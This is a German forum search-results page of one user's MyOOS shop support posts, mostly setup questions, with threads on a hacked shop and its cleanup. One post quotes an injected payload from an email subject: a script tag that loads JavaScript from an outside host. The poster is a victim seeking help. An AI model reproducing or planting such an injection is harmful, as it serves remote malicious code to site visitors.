Die Suche ergab 41 Treffer

von Maw.
16.09.2011, 09:04
Forum: MyOOS: Support
Thema: Seltsame Scripte -->auch im Mail-Betreff
Antworten: 4
Zugriffe: 4176

okay, danke, das werde ich noch googeln und dann auch so machen!

Dann viel Erfolg beim Kunden!

Schöne Grüße,
Marc
von Maw.
15.09.2011, 21:29
Forum: MyOOS: Support
Thema: Seltsame Scripte -->auch im Mail-Betreff
Antworten: 4
Zugriffe: 4176

Hallo ralf, admin war leider noch ungeschützt, hab ich jetzt per htaccess gemacht. Im images-ordner waren einige faule Scripte die ich gelöscht habe und auch sonst hab ich Sachen entdecken können. Jetzt wart ich mal eine Woche ab und komme dann gerne auf dein Angebot zurück, wenn sich wieder Problem...
von Maw.
13.09.2011, 18:47
Forum: MyOOS: Support
Thema: Seltsame Scripte -->auch im Mail-Betreff
Antworten: 4
Zugriffe: 4176

Seltsame Scripte -->auch im Mail-Betreff

Hallo, habe scheinbar komische Scripte in meinem Shop. Beim "Passwort zurücksetzen"-Mail hatte ich heute folgenden Betreff: Betreff: </title><script src= http://orangeblue.cl/js/ ></script><title> - Ihr neues Passwort. Wo such ich zuerst, um das rauszulöschen? Auslöser war dieser, dass Bes...
von Maw.
07.06.2011, 20:05
Forum: MyOOS: Support
Thema: Fatal Error am Ende des Shops
Antworten: 7
Zugriffe: 6052

Stimmt, das ist eine gute Idee, beim Provider anzufragen. Dem Hinweis mit den Scripten in /images/ bin ich nachgegangen und in der Tat sind da php-Dateien mit NAmen wie "pretty.php" "needle.php" "google12343545.php" mit Inhalten wie folgt vorhanden: <?php /** * Gets som...
von Maw.
07.06.2011, 19:44
Forum: MyOOS: Support
Thema: Fatal Error am Ende des Shops
Antworten: 7
Zugriffe: 6052

Hallo,
danke - mit diesen Stichworten der HTTP-Authentifizierung komm ich dann klar!

Datensicherung einspielen leider schwierig, wenn man nichts aktuelles hat :S

Was empfiehlst du sonst für Möglichkeiten der "Säuberung"?

Gruß Marc
von Maw.
07.06.2011, 15:57
Forum: MyOOS: Support
Thema: Fatal Error am Ende des Shops
Antworten: 7
Zugriffe: 6052

Hallo Ralf, den Inhalt des tempaltes_c Ordners hab ich schonmal gelöscht. Der Fehler war kurzzeitig weg, ist dann aber von selber wieder aufgetaucht. Ich kann ausschließen, dass von uns etwas an den Scripten geändert worden ist (seit einem Jahr nicht mehr..) - ich vermute, da tumelt sich noch etwas ...
von Maw.
06.06.2011, 13:33
Forum: MyOOS: Support
Thema: Fatal Error am Ende des Shops
Antworten: 7
Zugriffe: 6052

Fatal Error am Ende des Shops

Hallo, wir verwenden noch eine 1.4er Version des Shops und wurden glaub Opfer eines Hack/Viren-Angriffs - es gab mal für einen Tag lang eine Hack-Meldung auf der Shop-Seite, die jedoch vom Webhoster wieder entfernt wurde. Ohne irgendwelche Sachen im Shop geändert zu haben, erscheint nun auf einmal a...
von Maw.
11.09.2009, 08:34
Forum: MyOOS: Support
Thema: Shop auf italienisch?
Antworten: 1
Zugriffe: 2649

Shop auf italienisch?

Hallo, ich würde gerne meinen Shop auch auf italienisch laufen lassen?. Gibts für das System selbst ein Sprachpaket dafür? Oder müsste ich das eigenhändisch in den Sprachdateien umstellen? Und die Produkte muss ich alle duplizieren (neu anlegen) oder gibts dann die Möglichkeit im deutschen Produkt n...
von Maw.
26.06.2009, 15:29
Forum: MyOOS: Support
Thema: unterschiedliche Anzahl an Spalten und Zeilen in verschieden
Antworten: 2
Zugriffe: 3325

ja genau, das war die gesuchte Änderung. Hab es noch etwas für meine Zwecke angepasst und es hat schließlich den gewünschten Effekt gebracht.
Danke vielmals!

Lg Maw
von Maw.
24.06.2009, 20:04
Forum: MyOOS: Support
Thema: unterschiedliche Anzahl an Spalten und Zeilen in verschieden
Antworten: 2
Zugriffe: 3325

unterschiedliche Anzahl an Spalten und Zeilen in verschieden

Hallo,
ich habe den Shop so eingestellt, dass in der Produktübersicht 7 Zeilen mit jeweils 3 Produkten (=3 Spalten) angezeigt werden.
Nun hab ich eine spezielle Kategorie, wo ich 4 Spalten haben möchte.

Ist das möglich, dies nur in einer Kategorie zu ändern?

Gruß Maw
von Maw.
22.05.2009, 22:58
Forum: MyOOS: Support
Thema: Seltsames Problem mit Staffelpreisen
Antworten: 4
Zugriffe: 4314

okay, mit dem Löschen der Variablen, also mit UNSET hat es funktioniert!
Vielleicht nur ganz kurz, woran ist das gelegen? Warum ist das hier auf einmal so gewesen?

Schöne Grüße und vielen Dank!
Marc
von Maw.
21.05.2009, 11:22
Forum: MyOOS: Support
Thema: Seltsames Problem mit Staffelpreisen
Antworten: 4
Zugriffe: 4314

Hallo Ralf, folgender Code: case 'PRODUCT_LIST_PRICE': $lc_align = 'right'; if ( $listing['products_discount4'] > 0 ) { $price_discount = $oCurrencies->display_price($listing['products_discount4'], oos_get_tax_rate($listing['products_tax_class_id'])); } elseif ( $listing['products_discount3'] > 0 ) ...
von Maw.
20.05.2009, 10:20
Forum: MyOOS: Support
Thema: Seltsames Problem mit Staffelpreisen
Antworten: 4
Zugriffe: 4314

Seltsames Problem mit Staffelpreisen

Hallo, hab ein seltsames Problem, und zwar in einer Kategorie sind einige Produkte und sobald ein Produkt Staffelpreise hat, dann steht bei allen weiteren Produkten als Preis der billigste Staffelpreis des einen Produktes dort. Lösch ich die Staffelpreise raus, stimmt alles. Zu sehen hier: http://ww...
von Maw.
27.03.2009, 18:10
Forum: MyOOS: Support
Thema: [1.6.4] Sortierung der Produktmerkmale funktioniert nicht
Antworten: 9
Zugriffe: 7468

also die PReise für einzelne Optionen ändern sich nicht, aber wie du sagst, ich möchte die Optionswerte UND die Artikelmerkmale per Reihenfolge im Admin sortieren. also sortieren: Zusatz: Digitaldruck Zusatz: grün, gelb, rot Zusatz: Ständer ich möchte also sortieren können, dass "Zusatz: Digita...
von Maw.
26.03.2009, 20:14
Forum: MyOOS: Support
Thema: [1.6.4] Sortierung der Produktmerkmale funktioniert nicht
Antworten: 9
Zugriffe: 7468

ja ich hab eben 4 "Zusätze" bei einem Artikel. also viermal ein Produktmerkmal "Zusatz", allerdings ist das nicth immer dasselbe, sondern zweimal ists ein select-auswahlfeld, einmal eine checkbox und einmal radiobutton, beispielsweise. z.B. Zusatz: Ständer (Checkbox - also ja ode...